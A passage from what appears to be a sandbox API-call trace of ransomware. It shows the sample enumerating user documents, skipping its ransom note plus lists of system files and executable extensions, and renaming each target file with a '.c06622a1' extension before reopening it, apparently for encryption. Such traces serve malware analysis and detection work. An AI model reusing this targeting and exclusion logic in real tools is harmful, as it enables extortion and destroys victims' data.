_Str2="pdf") returned -4 [0158.659] wcslen (_String="lock") returned 0x4 [0158.659] _wcsicmp (_Str1="key", _Str2="pdf") returned -5 [0158.659] wcslen (_String="key") returned 0x3 [0158.659] _wcsicmp (_Str1="hta", _Str2="pdf") returned -8 [0158.659] wcslen (_String="hta") returned 0x3 [0158.659] _wcsicmp (_Str1="msi", _Str2="pdf") returned -3 [0158.659] wcslen (_String="msi") returned 0x3 [0158.659] _wcsicmp (_Str1="pdb", _Str2="pdf") returned -4 [0158.659] wcslen (_String="pdb") returned 0x3 [0158.659] _wcsicmp (_Str1="sqlite", _Str2="pdf") returned 3 [0158.659] wcslen (_String="sqlite") returned 0x6 [0158.659] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue")) returned 0x10 [0158.659] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a0090 [0158.659] wcscpy (in: _Dest=0x32a0090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE" [0158.659] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE") returned 0x54 [0158.659] wcscpy (in: _Dest=0x32a013a, _Source="BSAiBEBUj.pdf" | out: _Dest="BSAiBEBUj.pdf") returned="BSAiBEBUj.pdf" [0158.659] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\BSAiBEBUj.pdf", dwFileAttributes=0x80) returned 1 [0158.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\BSAiBEBUj.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\bsaibebuj.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0158.660] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.660] ReadFile (in: hFile=0x19c, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0158.661] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x1e928e41 [0158.661] RtlComputeCrc32 (PartialCrc=0x8e41, Buffer=0x32e4a4, Length=0x80) returned 0x294244f6 [0158.661] RtlComputeCrc32 (PartialCrc=0x44f6, Buffer=0x32e4a4, Length=0x80) returned 0xef160993 [0158.661] RtlComputeCrc32 (PartialCrc=0x993, Buffer=0x32e4a4, Length=0x80) returned 0xf8279d6e [0158.661] RtlComputeCrc32 (PartialCrc=0x9d6e, Buffer=0x32e4a4, Length=0x80) returned 0xa1cceb6a [0158.661] CloseHandle (hObject=0x19c) returned 1 [0158.661] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b0098 [0158.661] wcscpy (in: _Dest=0x32b0098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\BSAiBEBUj.pdf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\BSAiBEBUj.pdf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\BSAiBEBUj.pdf" [0158.661] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\BSAiBEBUj.pdf") returned 0x62 [0158.661] wcscpy (in: _Dest=0x32b015c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.661] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\BSAiBEBUj.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\bsaibebuj.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\BSAiBEBUj.pdf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\bsaibebuj.pdf.c06622a1"), dwFlags=0x8) returned 1 [0158.688] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\BSAiBEBUj.pdf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\bsaibebuj.pdf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x19c [0158.689] CreateIoCompletionPort (FileHandle=0x19c, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0158.689] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x35a0020 [0158.702] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3cfa830e [0158.702] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x72250b7f [0158.702] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x447968ce [0158.702] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x78e511db [0158.702] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4a4fe82f [0158.702] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x450f51e3 [0158.702] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x39489b70 [0158.702] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1502cf9b [0158.706] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x35a0094, Length=0x80) returned 0xe7abe91c [0158.706] RtlComputeCrc32 (PartialCrc=0xe91c, Buffer=0x35a0094, Length=0x80) returned 0x20edef3f [0158.706] RtlComputeCrc32 (PartialCrc=0xef3f, Buffer=0x35a0094, Length=0x80) returned 0x3ad8e4ef [0158.706] RtlComputeCrc32 (PartialCrc=0xe4ef, Buffer=0x35a0094, Length=0x80) returned 0xa07d4f45 [0158.706] RtlComputeCrc32 (PartialCrc=0x4f45, Buffer=0x35a0094, Length=0x80) returned 0xfd2ad097 [0158.706] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0158.706] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a0090) returned 1 [0158.706] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b0098) returned 1 [0158.706] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82e1b800, ftCreationTime.dwHighDateTime=0x1d5e1a2, ftLastAccessTime.dwLowDateTime=0x3002ac90, ftLastAccessTime.dwHighDateTime=0x1d5dc00, ftLastWriteTime.dwLowDateTime=0x3002ac90, ftLastWriteTime.dwHighDateTime=0x1d5dc00, nFileSizeHigh=0x0, nFileSizeLow=0x157be, dwReserved0=0x0, dwReserved1=0x0, cFileName="mRIBM.odp", cAlternateFileName="")) returned 1 [0158.707] _wcsicmp (_Str1="mRIBM.odp", _Str2="README.c06622a1.TXT") returned -5 [0158.707] wcsstr (_Str="mRIBM.odp", _SubStr="README") returned 0x0 [0158.707] _wcsicmp (_Str1="autorun.inf", _Str2="mRIBM.odp") returned -12 [0158.707] wcslen (_String="autorun.inf") returned 0xb [0158.707] _wcsicmp (_Str1="boot.ini", _Str2="mRIBM.odp") returned -11 [0158.707] wcslen (_String="boot.ini") returned 0x8 [0158.707] _wcsicmp (_Str1="bootfont.bin", _Str2="mRIBM.odp") returned -11 [0158.707] wcslen (_String="bootfont.bin") returned 0xc [0158.707] _wcsicmp (_Str1="bootsect.bak", _Str2="mRIBM.odp") returned -11 [0158.707] wcslen (_String="bootsect.bak") returned 0xc [0158.707] _wcsicmp (_Str1="desktop.ini", _Str2="mRIBM.odp") returned -9 [0158.707] wcslen (_String="desktop.ini") returned 0xb [0158.708] _wcsicmp (_Str1="iconcache.db", _Str2="mRIBM.odp") returned -4 [0158.708] wcslen (_String="iconcache.db") returned 0xc [0158.708] _wcsicmp (_Str1="ntldr", _Str2="mRIBM.odp") returned 1 [0158.708] wcslen (_String="ntldr") returned 0x5 [0158.708] _wcsicmp (_Str1="ntuser.dat", _Str2="mRIBM.odp") returned 1 [0158.708] wcslen (_String="ntuser.dat") returned 0xa [0158.708] _wcsicmp (_Str1="ntuser.dat.log", _Str2="mRIBM.odp") returned 1 [0158.708] wcslen (_String="ntuser.dat.log") returned 0xe [0158.708] _wcsicmp (_Str1="ntuser.ini", _Str2="mRIBM.odp") returned 1 [0158.708] wcslen (_String="ntuser.ini") returned 0xa [0158.708] _wcsicmp (_Str1="thumbs.db", _Str2="mRIBM.odp") returned 7 [0158.708] wcslen (_String="thumbs.db") returned 0x9 [0158.708] _wcsicmp (_Str1="386", _Str2="odp") returned -60 [0158.709] wcslen (_String="386") returned 0x3 [0158.709] _wcsicmp (_Str1="adv", _Str2="odp") returned -14 [0158.709] wcslen (_String="adv") returned 0x3 [0158.709] _wcsicmp (_Str1="ani", _Str2="odp") returned -14 [0158.709] wcslen (_String="ani") returned 0x3 [0158.709] _wcsicmp (_Str1="bat", _Str2="odp") returned -13 [0158.709] wcslen (_String="bat") returned 0x3 [0158.709] _wcsicmp (_Str1="bin", _Str2="odp") returned -13 [0158.709] wcslen (_String="bin") returned 0x3 [0158.709] _wcsicmp (_Str1="cab", _Str2="odp") returned -12 [0158.709] wcslen (_String="cab") returned 0x3 [0158.709] _wcsicmp (_Str1="cmd", _Str2="odp") returned -12 [0158.709] wcslen (_String="cmd") returned 0x3 [0158.709] _wcsicmp (_Str1="com", _Str2="odp") returned -12 [0158.709] wcslen (_String="com") returned 0x3 [0158.709] _wcsicmp (_Str1="cpl", _Str2="odp") returned -12 [0158.710] wcslen (_String="cpl") returned 0x3 [0158.710] _wcsicmp (_Str1="cur", _Str2="odp") returned -12 [0158.710] wcslen (_String="cur") returned 0x3 [0158.710] _wcsicmp (_Str1="deskthemepack", _Str2="odp") returned -11 [0158.710] wcslen (_String="deskthemepack") returned 0xd [0158.710] _wcsicmp (_Str1="diagcab", _Str2="odp") returned -11 [0158.710] wcslen (_String="diagcab") returned 0x7 [0158.710] _wcsicmp (_Str1="diagcfg", _Str2="odp") returned -11 [0158.710] wcslen (_String="diagcfg") returned 0x7 [0158.710] _wcsicmp (_Str1="diagpkg", _Str2="odp") returned -11 [0158.710] wcslen (_String="diagpkg") returned 0x7 [0158.710] _wcsicmp (_Str1="dll", _Str2="odp") returned -11 [0158.710] wcslen (_String="dll") returned 0x3 [0158.710] _wcsicmp (_Str1="drv", _Str2="odp") returned -11 [0158.710] wcslen (_String="drv") returned 0x3 [0158.710] _wcsicmp (_Str1="exe", _Str2="odp") returned -10 [0158.710] wcslen (_String="exe") returned 0x3 [0158.711] _wcsicmp (_Str1="hlp", _Str2="odp") returned -7 [0158.711] wcslen (_String="hlp") returned 0x3 [0158.711] _wcsicmp (_Str1="icl", _Str2="odp") returned -6 [0158.711] wcslen (_String="icl") returned 0x3 [0158.711] _wcsicmp (_Str1="icns", _Str2="odp") returned -6 [0158.711] wcslen (_String="icns") returned 0x4 [0158.711] _wcsicmp (_Str1="ico", _Str2="odp") returned -6 [0158.711] wcslen (_String="ico") returned 0x3 [0158.711] _wcsicmp (_Str1="ics", _Str2="odp") returned -6 [0158.711] wcslen (_String="ics") returned 0x3 [0158.711] _wcsicmp (_Str1="idx", _Str2="odp") returned -6 [0158.711] wcslen (_String="idx") returned 0x3 [0158.711] _wcsicmp (_Str1="ldf", _Str2="odp") returned -3 [0158.711] wcslen (_String="ldf") returned 0x3 [0158.711] _wcsicmp (_Str1="lnk", _Str2="odp") returned -3 [0158.711] wcslen (_String="lnk") returned 0x3 [0158.711] _wcsicmp (_Str1="mod", _Str2="odp") returned -2 [0158.711] wcslen (_String="mod") returned 0x3 [0158.712] _wcsicmp (_Str1="mpa", _Str2="odp") returned -2 [0158.712] wcslen (_String="mpa") returned 0x3 [0158.712] _wcsicmp (_Str1="msc", _Str2="odp") returned -2 [0158.712] wcslen (_String="msc") returned 0x3 [0158.712] _wcsicmp (_Str1="msp", _Str2="odp") returned -2 [0158.712] wcslen (_String="msp") returned 0x3 [0158.712] _wcsicmp (_Str1="msstyles", _Str2="odp") returned -2 [0158.712] wcslen (_String="msstyles") returned 0x8 [0158.712] _wcsicmp (_Str1="msu", _Str2="odp") returned -2 [0158.712] wcslen (_String="msu") returned 0x3 [0158.712] _wcsicmp (_Str1="nls", _Str2="odp") returned -1 [0158.712] wcslen (_String="nls") returned 0x3 [0158.712] _wcsicmp (_Str1="nomedia", _Str2="odp") returned -1 [0158.712] wcslen (_String="nomedia") returned 0x7 [0158.712] _wcsicmp (_Str1="ocx", _Str2="odp") returned -1 [0158.712] wcslen (_String="ocx") returned 0x3 [0158.712] _wcsicmp (_Str1="prf", _Str2="odp") returned 1 [0158.712] wcslen (_String="prf") returned 0x3 [0158.712] _wcsicmp (_Str1="ps1", _Str2="odp") returned 1 [0158.712] wcslen (_String="ps1") returned 0x3 [0158.712] _wcsicmp (_Str1="rom", _Str2="odp") returned 3 [0158.713] wcslen (_String="rom") returned 0x3 [0158.713] _wcsicmp (_Str1="rtp", _Str2="odp") returned 3 [0158.713] wcslen (_String="rtp") returned 0x3 [0158.713] _wcsicmp (_Str1="scr", _Str2="odp") returned 4 [0158.713] wcslen (_String="scr") returned 0x3 [0158.713] _wcsicmp (_Str1="shs", _Str2="odp") returned 4 [0158.713] wcslen (_String="shs") returned 0x3 [0158.713] _wcsicmp (_Str1="spl", _Str2="odp") returned 4 [0158.713] wcslen (_String="spl") returned 0x3 [0158.713] _wcsicmp (_Str1="sys", _Str2="odp") returned 4 [0158.713] wcslen (_String="sys") returned 0x3 [0158.713] _wcsicmp (_Str1="theme", _Str2="odp") returned 5 [0158.713] wcslen (_String="theme") returned 0x5 [0158.713] _wcsicmp (_Str1="themepack", _Str2="odp") returned 5 [0158.713] wcslen (_String="themepack") returned 0x9 [0158.713] _wcsicmp (_Str1="wpx", _Str2="odp") returned 8 [0158.713] wcslen (_String="wpx") returned 0x3 [0158.713] _wcsicmp (_Str1="lock", _Str2="odp") returned -3 [0158.713] wcslen (_String="lock") returned 0x4 [0158.714] _wcsicmp (_Str1="key", _Str2="odp") returned -4 [0158.714] wcslen (_String="key") returned 0x3 [0158.714] _wcsicmp (_Str1="hta", _Str2="odp") returned -7 [0158.714] wcslen (_String="hta") returned 0x3 [0158.714] _wcsicmp (_Str1="msi", _Str2="odp") returned -2 [0158.714] wcslen (_String="msi") returned 0x3 [0158.714] _wcsicmp (_Str1="pdb", _Str2="odp") returned 1 [0158.714] wcslen (_String="pdb") returned 0x3 [0158.714] _wcsicmp (_Str1="sqlite", _Str2="odp") returned 4 [0158.714] wcslen (_String="sqlite") returned 0x6 [0158.714] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue")) returned 0x10 [0158.714] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a0090 [0158.714] wcscpy (in: _Dest=0x32a0090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE" [0158.714] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE") returned 0x54 [0158.715] wcscpy (in: _Dest=0x32a013a, _Source="mRIBM.odp" | out: _Dest="mRIBM.odp") returned="mRIBM.odp" [0158.715] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\mRIBM.odp", dwFileAttributes=0x80) returned 1 [0158.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\mRIBM.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\mribm.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0158.720] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.720] ReadFile (in: hFile=0x194, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0158.721] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x15d7fd5a [0158.721] RtlComputeCrc32 (PartialCrc=0xfd5a, Buffer=0x32e4a4, Length=0x80) returned 0x7a62e19f [0158.721] RtlComputeCrc32 (PartialCrc=0xe19f, Buffer=0x32e4a4, Length=0x80) returned 0x5f702e7d [0158.721] RtlComputeCrc32 (PartialCrc=0x2e7d, Buffer=0x32e4a4, Length=0x80) returned 0xf2da18a9 [0158.721] RtlComputeCrc32 (PartialCrc=0x18a9, Buffer=0x32e4a4, Length=0x80) returned 0x7a9aed9e [0158.721] CloseHandle (hObject=0x194) returned 1 [0158.721] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b0098 [0158.721] wcscpy (in: _Dest=0x32b0098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\mRIBM.odp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\mRIBM.odp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\mRIBM.odp" [0158.721] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\mRIBM.odp") returned 0x5e [0158.721] wcscpy (in: _Dest=0x32b0154, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.721] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\mRIBM.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\mribm.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\mRIBM.odp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\mribm.odp.c06622a1"), dwFlags=0x8) returned 1 [0158.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\mRIBM.odp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\mribm.odp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c8 [0158.735] CreateIoCompletionPort (FileHandle=0x1c8, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0158.735] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0158.740] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2990f0cb [0158.740] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x592934d3 [0158.740] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6efcafc9 [0158.740] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2b099de7 [0158.740] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x792ce6e4 [0158.740] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x50225114 [0158.740] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x100b9d5e [0158.740] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2d0de24e [0158.743] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x8780a4ee [0158.743] RtlComputeCrc32 (PartialCrc=0xa4ee, Buffer=0x710094, Length=0x80) returned 0x8d3b6167 [0158.743] RtlComputeCrc32 (PartialCrc=0x6167, Buffer=0x710094, Length=0x80) returned 0x1d1ecf51 [0158.743] RtlComputeCrc32 (PartialCrc=0xcf51, Buffer=0x710094, Length=0x80) returned 0xc50ef4fc [0158.743] RtlComputeCrc32 (PartialCrc=0xf4fc, Buffer=0x710094, Length=0x80) returned 0xe47629e2 [0158.743] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0158.743] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a0090) returned 1 [0158.743] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b0098) returned 1 [0158.743] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3ebfe0, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8c3ebfe0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8c3ebfe0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0158.743] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0158.743] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1db0d030, ftCreationTime.dwHighDateTime=0x1d5dd40, ftLastAccessTime.dwLowDateTime=0x22cc25a0, ftLastAccessTime.dwHighDateTime=0x1d5e5c5, ftLastWriteTime.dwLowDateTime=0x22cc25a0, ftLastWriteTime.dwHighDateTime=0x1d5e5c5, nFileSizeHigh=0x0, nFileSizeLow=0x171f, dwReserved0=0x0, dwReserved1=0x0, cFileName="rNgfIYXf.rtf", cAlternateFileName="")) returned 1 [0158.743] _wcsicmp (_Str1="rNgfIYXf.rtf", _Str2="README.c06622a1.TXT") returned 9 [0158.744] wcsstr (_Str="rNgfIYXf.rtf", _SubStr="README") returned 0x0 [0158.744] _wcsicmp (_Str1="autorun.inf", _Str2="rNgfIYXf.rtf") returned -17 [0158.744] wcslen (_String="autorun.inf") returned 0xb [0158.744] _wcsicmp (_Str1="boot.ini", _Str2="rNgfIYXf.rtf") returned -16 [0158.744] wcslen (_String="boot.ini") returned 0x8 [0158.744] _wcsicmp (_Str1="bootfont.bin", _Str2="rNgfIYXf.rtf") returned -16 [0158.744] wcslen (_String="bootfont.bin") returned 0xc [0158.744] _wcsicmp (_Str1="bootsect.bak", _Str2="rNgfIYXf.rtf") returned -16 [0158.744] wcslen (_String="bootsect.bak") returned 0xc [0158.744] _wcsicmp (_Str1="desktop.ini", _Str2="rNgfIYXf.rtf") returned -14 [0158.744] wcslen (_String="desktop.ini") returned 0xb [0158.744] _wcsicmp (_Str1="iconcache.db", _Str2="rNgfIYXf.rtf") returned -9 [0158.744] wcslen (_String="iconcache.db") returned 0xc [0158.744] _wcsicmp (_Str1="ntldr", _Str2="rNgfIYXf.rtf") returned -4 [0158.744] wcslen (_String="ntldr") returned 0x5 [0158.744] _wcsicmp (_Str1="ntuser.dat", _Str2="rNgfIYXf.rtf") returned -4 [0158.744] wcslen (_String="ntuser.dat") returned 0xa [0158.744] _wcsicmp (_Str1="ntuser.dat.log", _Str2="rNgfIYXf.rtf") returned -4 [0158.744] wcslen (_String="ntuser.dat.log") returned 0xe [0158.744] _wcsicmp (_Str1="ntuser.ini", _Str2="rNgfIYXf.rtf") returned -4 [0158.744] wcslen (_String="ntuser.ini") returned 0xa [0158.744] _wcsicmp (_Str1="thumbs.db", _Str2="rNgfIYXf.rtf") returned 2 [0158.744] wcslen (_String="thumbs.db") returned 0x9 [0158.744] _wcsicmp (_Str1="386", _Str2="rtf") returned -63 [0158.744] wcslen (_String="386") returned 0x3 [0158.744] _wcsicmp (_Str1="adv", _Str2="rtf") returned -17 [0158.744] wcslen (_String="adv") returned 0x3 [0158.744] _wcsicmp (_Str1="ani", _Str2="rtf") returned -17 [0158.744] wcslen (_String="ani") returned 0x3 [0158.744] _wcsicmp (_Str1="bat", _Str2="rtf") returned -16 [0158.744] wcslen (_String="bat") returned 0x3 [0158.745] _wcsicmp (_Str1="bin", _Str2="rtf") returned -16 [0158.745] wcslen (_String="bin") returned 0x3 [0158.745] _wcsicmp (_Str1="cab", _Str2="rtf") returned -15 [0158.745] wcslen (_String="cab") returned 0x3 [0158.745] _wcsicmp (_Str1="cmd", _Str2="rtf") returned -15 [0158.745] wcslen (_String="cmd") returned 0x3 [0158.745] _wcsicmp (_Str1="com", _Str2="rtf") returned -15 [0158.745] wcslen (_String="com") returned 0x3 [0158.745] _wcsicmp (_Str1="cpl", _Str2="rtf") returned -15 [0158.745] wcslen (_String="cpl") returned 0x3 [0158.745] _wcsicmp 